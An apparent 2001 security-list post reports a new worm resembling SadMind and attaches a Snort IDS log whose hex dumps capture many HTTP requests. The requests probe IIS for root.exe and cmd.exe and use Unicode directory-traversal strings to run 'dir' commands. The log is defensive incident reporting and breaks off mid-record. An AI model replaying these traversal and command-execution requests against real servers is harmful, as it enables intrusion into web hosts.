I got this scan last night. Actually I got about 20 of these scans last night from different IP's, all within my class A. I looks alot like the SadMind worm, but if you look closely, it isn't. The scan is a much more thorough scan for the Unicode directory traversal vulnerability. SadMind didn't scan _mem_bin or try to look for cmd.exe on the d drive as this scan does. As I said, I got this scan from about 20 different hosts, and everyone did the same attempts in the same order. Looks like we got a new worm on our hands. -Steve <------------begin scan log-----------> ---------------------------------------------------------------------------- -- #(2 - 23173) [2001-09-18 08:44:56] WEB-IIS root.exe access IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=112 ID=51156 flags=0 offset=0 TTL=123 chksum=19696 TCP: port=2419 -> dport: 80 flags=***AP*** seq=3574684183 ack=2133368913 off=5 res=0 win=65535 urp=0 chksum=36743 Payload: length = 72 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo 010 : 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT 020 : 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www 030 : 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c 040 : 6C 6F 73 65 0D 0A 0D 0A lose.... ---------------------------------------------------------------------------- -- #(2 - 23174) [2001-09-18 08:44:57] WEB-IIS cmd.exe access IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=120 ID=51295 flags=0 offset=0 TTL=123 chksum=19549 TCP: port=2571 -> dport: 80 flags=***AP*** seq=3578917915 ack=2133369798 off=5 res=0 win=65535 urp=0 chksum=47615 Payload: length = 80 000 : 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys 010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H 030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close.... ---------------------------------------------------------------------------- -- #(2 - 23175) [2001-09-18 08:44:57] WEB-IIS cmd.exe access IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=120 ID=51407 flags=0 offset=0 TTL=123 chksum=19437 TCP: port=2645 -> dport: 80 flags=***AP*** seq=3582698035 ack=2133370349 off=5 res=0 win=65535 urp=0 chksum=2364 Payload: length = 80 000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys 010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H 030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close.... ---------------------------------------------------------------------------- -- #(2 - 23176) [2001-09-18 08:45:01] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=136 ID=51893 flags=0 offset=0 TTL=123 chksum=18935 TCP: port=2649 -> dport: 80 flags=***AP*** seq=3583242352 ack=2133371302 off=5 res=0 win=65535 urp=0 chksum=33450 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H 040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close.. ---------------------------------------------------------------------------- -- #(2 - 23177) [2001-09-18 08:45:02] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=157 ID=52026 flags=0 offset=0 TTL=123 chksum=18781 TCP: port=2818 -> dport: 80 flags=***AP*** seq=3592447432 ack=2133374805 off=5 res=0 win=65535 urp=0 chksum=17590 Payload: length = 111 000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../.. 020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst 030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1 050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C 060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo ---------------------------------------------------------------------------- -- #(2 - 23178) [2001-09-18 08:45:02] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=157 ID=52122 flags=0 offset=0 TTL=123 chksum=18685 TCP: port=2891 -> dport: 80 flags=***AP*** seq=3596176073 ack=2133375355 off=5 res=0 win=65535 urp=0 chksum=25116 Payload: length = 111 000 : 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/.. 010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../.. 020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst 030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1 050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C 060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo ---------------------------------------------------------------------------- -- #(2 - 23179) [2001-09-18 08:45:03] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=185 ID=52158 flags=0 offset=0 TTL=123 chksum=18621 TCP: port=2897 -> dport: 80 flags=***AP*** seq=3596616353 ack=2133375899 off=5 res=0 win=65535 urp=0 chksum=19409 Payload: length = 127 000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c 010 : 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c 020 : 2F 2E 2E 35 35 2E 2E 2F 2E 2E 63 31 2E 2E 2F 2E /..55../..c1../. 030 : 2E 2F 2E 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ./.../winnt/syst 040 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 050 : 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F dir 32/cmd.exe?/ 060 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 070 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E Host: www..Conn ---------------------------------------------------------------------------- -- #(2 - 23180) [2001-09-18 08:45:03] WEB-IIS cmd.exe access IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=137 ID=52304 flags=0 offset=0 TTL=123 chksum=18523 TCP: port=3008 -> dport: 80 flags=***AP*** seq=3601578388 ack=2133376550 off=5 res=0 win=65535 urp=0 chksum=11948 Payload: length = 91 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho 040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec 050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close ---------------------------------------------------------------------------- -- #(2 - 23182) [2001-09-18 08:45:04] WEB-IIS cmd.exe access IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=137 ID=52382 flags=0 offset=0 TTL=123 chksum=18445 TCP: port=3026 -> dport: 80 flags=***AP*** seq=3603114557 ack=2133377691 off=5 res=0 win=65535 urp=0 chksum=46692 Payload: length = 91 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho 040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec 050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close ---------------------------------------------------------------------------- -- #(2 - 23183) [2001-09-18 08:45:05] WEB-IIS cmd.exe access IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=137 ID=52747 flags=0 offset=0 TTL=123 chksum=18080 TCP: port=3029 -> dport: 80 flags=***AP*** seq=3603372780 ack=2133378431 off=5 res=0 win=65535 urp=0 chksum=49819 Payload: length = 91 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho 040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec 050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close ---------------------------------------------------------------------------- -- #(2 - 23184) [2001-09-18 08:45:05] WEB-IIS cmd.exe access IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=137 ID=52944 flags=0 offset=0 TTL=123 chksum=17883 TCP: port=3034 -> dport: 80 flags=***AP*** seq=3603663173 ack=2133378648 off=5 res=0 win=65535 urp=0 chksum=22151 Payload: length = 91 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho 040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec 050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close ---------------------------------------------------------------------------- -- #(2 - 23185) [2001-09-18 08:45:07] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=138 ID=53099 flags=0 offset=0 TTL=123 chksum=17727 TCP: port=3043 -> dport: 80 flags=***AP*** seq=3604607032 ack=2133380213 off=5 res=0 win=65535 urp=0 chksum=13390 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D ir dir HTTP/1.0. 040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E .Host: www..Conn 050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 nection: close ---------------------------------------------------------------------------- -- #(2 - 23186) [2001-09-18 08:45:09] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=136 ID=53291 flags=0 offset=0 TTL=123 chksum=17537 TCP: port=3125 -> dport: 80 flags=***AP*** seq=3609112694 ack=2133382006 off=5 res=0 win=65535 urp=0 chksum=41583 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H 040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close.. ---------------------------------------------------------------------------- -- #(2 - 23187) [2001-09-18 08:45:12] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=140 ID=53537 flags=0 offset=0 TTL=123 chksum=17287 TCP: port=3233 -> dport: 80 flags=***AP*** seq=3614822904 ack=2133384416 off=5 res=0 win=65535 urp=0 chksum=3730 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E ir c+dir HTTP/1. 040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 0..Host: www..Co 050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F nnnection: clo ---------------------------------------------------------------------------- -- #(2 - 23192) [2001-09-18 08:45:25] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=136 ID=56915 flags=0 offset=0 TTL=123 chksum=13913 TCP: port=3255 -> dport: 80 flags=***AP*** seq=3617233670 ack=2133389625 off=5 res=0 win=65535 urp=0 chksum=36633 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 2f../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H 040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close.. ---------------------------------------------------------------------------- -- #(2 - 23443) [2001-09-18 09:01:44] WEB-IIS CodeRed v2 root.exe access IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=112 ID=6898 flags=0 offset=0 TTL=123 chksum=63955 TCP: port=3144 -> dport: 80 flags=***AP*** seq=1769080350 ack=741806457 off=5 res=0 win=65535 urp=0 chksum=11798 Payload: length = 72 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo 010 : 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT 020 : 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www 030 : 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c 040 : 6C 6F 73 65 0D 0A 0D 0A lose.... ---------------------------------------------------------------------------- -- #(2 - 23444) [2001-09-18 09:01:45] WEB-IIS cmd.exe access IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=120 ID=6924 flags=0 offset=0 TTL=123 chksum=63921 TCP: port=3149 -> dport: 80 flags=***AP*** seq=1769404108 ack=741806470 off=5 res=0 win=65535 urp=0 chksum=1563 Payload: length = 80 000 : 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys 010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H 030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close.... ---------------------------------------------------------------------------- -- #(2 - 23445) [2001-09-18 09:01:45] WEB-IIS cmd.exe access IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=120 ID=6938 flags=0 offset=0 TTL=123 chksum=63907 TCP: port=3152 -> dport: 80 flags=***AP*** seq=1769560961 ack=741934470 off=5 res=0 win=65535 urp=0 chksum=44381 Payload: length = 80 000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys 010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H 030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close.... ---------------------------------------------------------------------------- -- #(2 - 23446) [2001-09-18 09:01:45] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=136 ID=6955 flags=0 offset=0 TTL=123 chksum=63874 TCP: port=3155 -> dport: 80 flags=***AP*** seq=1769708384 ack=741934489 off=5 res=0 win=65535 urp=0 chksum=14551 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H 040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close.. ---------------------------------------------------------------------------- -- #(2 - 23447) [2001-09-18 09:01:45] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=157 ID=6967 flags=0 offset=0 TTL=123 chksum=63841 TCP: port=3158 -> dport: 80 flags=***AP*** seq=1769873826 ack=741934503 off=5 res=0 win=65535 urp=0 chksum=63689 Payload: length = 111 000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../.. 020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst 030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1 050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C 060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo ---------------------------------------------------------------------------- -- #(2 - 23448) [2001-09-18 09:01:45] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=157 ID=6978 flags=0 offset=0 TTL=123 chksum=63830 TCP: port=3159 -> dport: 80 flags=***AP*** seq=1769952837 ack=741934520 off=5 res=0 win=65535 urp=0 chksum=51490 Payload: length = 111 000 : 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/.. 010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../.. 020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst 030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1 050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C 060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo ---------------------------------------------------------------------------- -- #(2 - 23449) [2001-09-18 09:01:45] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=185 ID=6997 flags=0 offset=0 TTL=123 chksum=63783 TCP: port=3161 -> dport: 80 flags=***AP*** seq=1770079155 ack=741934531 off=5 res=0 win=65535 urp=0 chksum=32607 Payload: length = 127 000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c 010 : 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c 020 : 2F 2E 2E 35 35 2E 2E 2F 2E 2E 63 31 2E 2E 2F 2E /..55../..c1../. 030 : 2E 2F 2E 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ./.../winnt/syst 040 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 050 : 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F dir 32/cmd.exe?/ 060 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 070 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E Host: www..Conn ---------------------------------------------------------------------------- -- #(2 - 23450) [2001-09-18 09:01:45] WEB-IIS cmd.exe access IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=137 ID=7023 flags=0 offset=0 TTL=123 chksum=63805 TCP: port=3168 -> dport: 80 flags=***AP*** seq=1770439362 ack=741934537 off=5 res=0 win=65535 urp=0 chksum=40273 Payload: length = 91 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho 040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec 050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close ---------------------------------------------------------------------------- -- #(2 - 23451) [2001-09-18 09:01:45] WEB-IIS cmd.exe access IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=137 ID=7048 flags=0 offset=0 TTL=123 chksum=63780 TCP: port=3178 -> dport: 80 flags=***AP*** seq=1770941763 ack=741934543 off=5 res=0 win=65535 urp=0 chksum=61368 Payload: length = 91 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho 040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec 050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close ---------------------------------------------------------------------------- -- #(2 - 23452) [2001-09-18 09:01:46] WEB-IIS cmd.exe access IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=137 ID=7074 flags=0 offset=0 TTL=123 chksum=63754 TCP: port=3185 -> dport: 80 flags=***AP*** seq=1771344844 ack=741934559 off=5 res=0 win=65535 urp=0 chksum=51427 Payload: length = 91 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho 040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec 050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close ---------------------------------------------------------------------------- -- #(2 - 23453) [2001-09-18 09:01:46] WEB-IIS cmd.exe access IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=137 ID=7093 flags=0 offset=0 TTL=123 chksum=63735 TCP: port=3190 -> dport: 80 flags=***AP*** seq=1771628861 ack=741934568 off=5 res=0 win=65535 urp=0 chksum=30343 Payload: length = 91 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho 040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec 050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close ---------------------------------------------------------------------------- -- #(2 - 23454) [2001-09-18 09:01:46] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=138 ID=7120 flags=0 offset=0 TTL=123 chksum=63707 TCP: port=3195 -> dport: 80 flags=***AP*** seq=1771898912 ack=741934579 off=5 res=0 win=65535 urp=0 chksum=41598 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D ir dir HTTP/1.0. 040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E .Host: www..Conn 050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 nection: close ---------------------------------------------------------------------------- -- #(2 - 23455) [2001-09-18 09:01:46] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=136 ID=7159 flags=0 offset=0 TTL=123 chksum=63670 TCP: port=3202 -> dport: 80 flags=***AP*** seq=1772285234 ack=741934584 off=5 res=0 win=65535 urp=0 chksum=62289 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H 040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close.. ---------------------------------------------------------------------------- -- #(2 - 23456) [2001-09-18 09:01:46] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.45.70 -> 65.29.59.66 hlen=5 TOS=0 dlen=140 ID=7227 flags=0 offset=0 TTL=123 chksum=63598 TCP: port=3206 -> dport: 80 flags=***AP*** seq=1772532327 ack=741934640 off=5 res=0 win=65535 urp=0 chksum=50606 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 